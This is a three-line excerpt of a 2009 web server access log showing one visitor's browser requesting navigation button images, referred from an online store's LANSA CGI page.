209.248.182.230 - - [28/Jul/2009:07:26:43 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0003048" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.248.182.230 - - [28/Jul/2009:07:26:43 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0003048" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.248.182.230 - - [28/Jul/2009:07:26:43 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0003048" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
